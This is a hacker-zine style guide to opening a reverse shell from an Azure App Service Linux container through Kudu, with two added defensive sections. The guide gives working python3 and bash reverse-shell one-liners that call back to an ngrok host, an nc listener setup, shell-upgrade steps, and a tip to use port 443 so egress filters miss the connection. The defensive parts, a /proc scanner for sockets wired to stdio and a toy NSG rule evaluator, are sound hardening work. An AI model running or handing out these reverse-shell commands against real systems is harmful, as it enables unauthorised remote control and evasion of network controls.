____________________  _____________________
/                    \/                     \
|  4 FUN & PR0F1T:    |  a hax0rz gu1de 2    |
|  AZURE KUDU OWNED   |  rev shellz & lulz   |
 \____________________/\_____________________/

   by: ][nfiltrat0r_X  //  released into the wild  //  2k2X

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   "if you didn't own it first, you don't own it at all."
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[INTRO - read or GTFO]

So you got an Azure App Service Linux box and you want a shell. Good. You should want a shell. Shells are beautiful.

Here's the deal: inbound SSH from outside? BLOCKED. Azure said no. Azure is a coward. BUT outbound TCP? Wide open like the front page of hacker news. So we flip it. Reverse shell. Oldest trick in the book. Still works. Always will.

This is your box. Your infra. We're just here to remind you how to use it properly. Now pay attention.

[PHASE 1 - arm your local rig]

Step 1: Get ngrok. If you don't have ngrok you're already behind.

# pop a TCP tunnel -- give the box a number to call home to
ngrok tcp 4444

# it spits something like:
# Forwarding tcp://0.tcp.ngrok.io:12345 -> localhost:4444
# WRITE THAT DOWN. that's your beeper number.

# now sit there and wait like a patient predator
nc -lvp 4444

Both windows stay OPEN. Don't be dumb. Don't close them. Go grab coffee if you want but those windows STAY OPEN.

[PHASE 2 - make the box call home]

Drop into Kudu DebugConsole at /DebugConsole on your SCM endpoint. Or use whatever RCE vector you're testing. No judgment.

METHOD A: python3 (almost always available — bless Microsoft for not being TOTALLY useless here)

python3 -c '
import socket,os,pty
s=socket.socket()
s.connect(("0.tcp.ngrok.io",12345))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")'

METHOD B: bash one-liner, for the lazy (respect)

bash -i >& /dev/tcp/0.tcp.ngrok.io/12345 0>&1

Your nc window should light up. BOOM. You're in. Take a moment. Breathe. You earned it.
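[ADDED - blue team corner] Not part of the original nfo. What METHOD A actually does on the box is dup2() a socket onto fds 0/1/2, and METHOD B does the same through bash's /dev/tcp. That footprint is visible from inside the container: read /proc/<pid>/fd and look for stdio symlinks that point at socket:[...]. The pure check is split out from the /proc walk so it can be exercised on constructed fd maps; run the walk from the Kudu SSH session described further down. The function names, the sample fd maps and the link pattern are this example's own assumptions, not Azure or Kudu tooling.

```python
"""Added example: detect processes whose stdio has been dup2()'d onto a socket.

Linux-only for the live scan (reads /proc). The classification logic is pure
so it can be checked against constructed fd maps.
"""
import os
import re

# /proc/<pid>/fd/N -> "socket:[inode]" is how the kernel renders a socket fd
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def stdio_on_socket(fd_targets):
    """fd_targets: {fd_number: symlink_target}. Returns the set of standard
    fds (0, 1, 2) that point at a socket."""
    return {fd for fd in (0, 1, 2)
            if fd in fd_targets and SOCKET_LINK.match(fd_targets[fd])}


def classify(fd_targets):
    """All three stdio fds on a socket is the classic reverse-shell shape;
    one or two is worth a look (socket-activated daemons do this legitimately)."""
    hits = stdio_on_socket(fd_targets)
    if len(hits) == 3:
        return "reverse-shell-pattern"
    if hits:
        return "partial"
    return "clean"


def read_proc_fds(pid):
    """Read /proc/<pid>/fd/* symlinks into {fd: target}; skips unreadable ones."""
    targets = {}
    fd_dir = f"/proc/{pid}/fd"
    try:
        entries = os.listdir(fd_dir)
    except OSError:
        return targets
    for name in entries:
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except (OSError, ValueError):
            continue
    return targets


def scan_all():
    """Walk /proc and return [(pid, comm, verdict)] for anything not clean.
    Returns [] where /proc is not available (non-Linux)."""
    findings = []
    try:
        names = os.listdir("/proc")
    except OSError:
        return findings
    for name in names:
        if not name.isdigit():
            continue
        pid = int(name)
        verdict = classify(read_proc_fds(pid))
        if verdict == "clean":
            continue
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            comm = "?"
        findings.append((pid, comm, verdict))
    return findings


# Constructed samples: what /proc/<pid>/fd looks like for the python3 parent of
# METHOD A (fd 3 is the socket itself, 0-2 are its dup2() copies) versus a
# normal interactive process sitting on a pty.
SAMPLE_REVSHELL = {0: "socket:[123456]", 1: "socket:[123456]",
                   2: "socket:[123456]", 3: "socket:[123456]"}
SAMPLE_NORMAL = {0: "/dev/pts/0", 1: "/dev/pts/0",
                 2: "/dev/pts/0", 3: "/var/log/app.log"}

if __name__ == "__main__":
    for pid, comm, verdict in scan_all():
        print(f"pid={pid} comm={comm} {verdict}")
```

Note that with pty.spawn() it is the python3 parent that gets flagged; the bash child sits on a pty slave and looks clean on its own, so walk the whole process list rather than grepping for bash. Treat "partial" as a lead, not a verdict.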

[PHASE 3 - don't be a n00b, upgrade your shell]

Raw netcat shell is suffering. Tab complete doesn't work. Ctrl+C kills the connection. Vim looks like a ransom note. FIX IT.

# spawn a proper PTY like a civilized hacker
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Ctrl+Z  (background that sucker)

# fix your local terminal so you stop crying
stty raw -echo; fg

# tell the remote what kind of terminal you're running
export TERM=xterm

Now you have tab complete. Arrow keys. Command history. You are no longer a feral creature. Welcome to the good life.

[AZURE LANDMINES - read or get rekt]

PORT GAMES: Port 4444 might get slapped by NSGs if VNet integration is in play. Azure loves its little firewalls. Trick them:

ngrok tcp 443   # 443 gets through almost everywhere.
                # nobody blocks 443. nobody.

VNET-INTEGRATED APPS: Outbound routes through subnet NSGs. If your shell isn't connecting, check whether TCP egress to *.ngrok.io is even allowed before you lose your mind.

THE REAL LESSON (for the blue teamers reading this): If you're testing your OWN hardening — this whole exercise shows you exactly what to lock down. Block outbound TCP to untrusted destinations and the reverse shell dies before it even tries to call home. THAT's the fix. Go do it.
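[ADDED - blue team corner] Not from the original nfo. The "nobody blocks 443" line above is exactly why a port filter is not the fix. An NSG walks outbound rules lowest-priority-number-first, first match wins, and the built-in tail is AllowVnetOutBound (65000), AllowInternetOutBound (65001), DenyAllOutBound (65500), so by default the call-home is allowed on every port. The toy evaluator below models that ordering and puts the weak (default) rule set next to a hardened one that adds narrow allows plus an explicit Deny on the Internet tag. The VNet range, the "needed SaaS" prefix and the tunnel IP are constructed placeholders, and the service-tag modelling is a deliberate simplification of Azure's real tags.

```python
"""Added example: toy model of NSG outbound evaluation, default vs hardened."""
import ipaddress
from dataclasses import dataclass

# Constructed VNet address space standing in for the VirtualNetwork tag
VNET_PREFIXES = [ipaddress.ip_network("10.0.0.0/8")]


@dataclass(frozen=True)
class Rule:
    name: str
    priority: int        # lower number is evaluated first, NSG-style
    access: str          # "Allow" or "Deny"
    dest_prefix: str     # CIDR, "*", or a modelled tag: VirtualNetwork / Internet
    dest_ports: str      # "*", "443", or a range like "1024-65535"
    protocol: str = "*"  # "Tcp", "Udp" or "*"


def _matches_prefix(ip_str, prefix):
    ip = ipaddress.ip_address(ip_str)
    in_vnet = any(ip in n for n in VNET_PREFIXES)
    if prefix == "*":
        return True
    if prefix == "VirtualNetwork":
        return in_vnet
    if prefix == "Internet":
        # Azure's Internet tag means "outside the VNet"; modelled that way here
        return not in_vnet
    return ip in ipaddress.ip_network(prefix)


def _matches_port(port, spec):
    if spec == "*":
        return True
    if "-" in spec:
        lo, hi = (int(x) for x in spec.split("-"))
        return lo <= port <= hi
    return port == int(spec)


def evaluate(rules, dst_ip, dst_port, protocol="Tcp"):
    """Return (access, rule_name) for the first matching rule by priority.
    Nothing matching falls through to an implicit deny."""
    for r in sorted(rules, key=lambda r: r.priority):
        if r.protocol not in ("*", protocol):
            continue
        if _matches_prefix(dst_ip, r.dest_prefix) and _matches_port(dst_port, r.dest_ports):
            return r.access, r.name
    return "Deny", "DenyAllOutBound"


# Azure's built-in default outbound rules (names and priorities are the real ones)
DEFAULT_OUTBOUND = [
    Rule("AllowVnetOutBound", 65000, "Allow", "VirtualNetwork", "*"),
    Rule("AllowInternetOutBound", 65001, "Allow", "Internet", "*"),
    Rule("DenyAllOutBound", 65500, "Deny", "*", "*"),
]

# Hardened: allow only what the app really needs, then deny the Internet tag
# ahead of the defaults. 203.0.113.0/24 (TEST-NET-3) is a constructed stand-in
# for "the one external endpoint this app talks to".
HARDENED_OUTBOUND = DEFAULT_OUTBOUND + [
    Rule("AllowNeededSaaS443", 100, "Allow", "203.0.113.0/24", "443", "Tcp"),
    Rule("DenyInternetOutBound", 4000, "Deny", "Internet", "*"),
]

# Constructed: an address standing in for whatever 0.tcp.ngrok.io resolves to
TUNNEL_IP = "198.51.100.7"

if __name__ == "__main__":
    for label, rules in (("default", DEFAULT_OUTBOUND), ("hardened", HARDENED_OUTBOUND)):
        for port in (12345, 443):
            print(label, port, evaluate(rules, TUNNEL_IP, port))
```

The same lesson carries over if egress is fronted by Azure Firewall or another FQDN-aware filter instead of a subnet NSG: the win comes from default-deny with explicit allows, not from which ports are open.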

[FOR THE LAZY / LEGIT DEBUG - Kudu SSH]

Don't want to do any of the above? Fine. Azure gave you a free shell and you've been ignoring it like a fool:

https://<appname>.scm.azurewebsites.net/webssh/host

Or from CLI if you're too good for browsers:

az webapp ssh --name <appname> --resource-group <rg>

No ngrok. No listener. No port games. It just works. Use this for daily debugging. Use the reverse shell to TEST whether your outbound controls actually do what you think they do.

[GREETZ & SHOUTOUTZ]

Shouts to: all the sysadmins who thought "nobody would ever"
Shouts to: ngrok for existing
Shouts to: Azure for leaving outbound TCP open by default
Shouts to: you, for reading this far

No shouts to: script kiddies who skip the notes, people who don't upgrade their PTY, whoever decided port 22 should be blocked inbound


This nfo is released as-is. No warranty. No refunds. Own your own stuff. Don't be evil. Have fun. Stay curious.

[EOF - ][nfiltrat0r_X]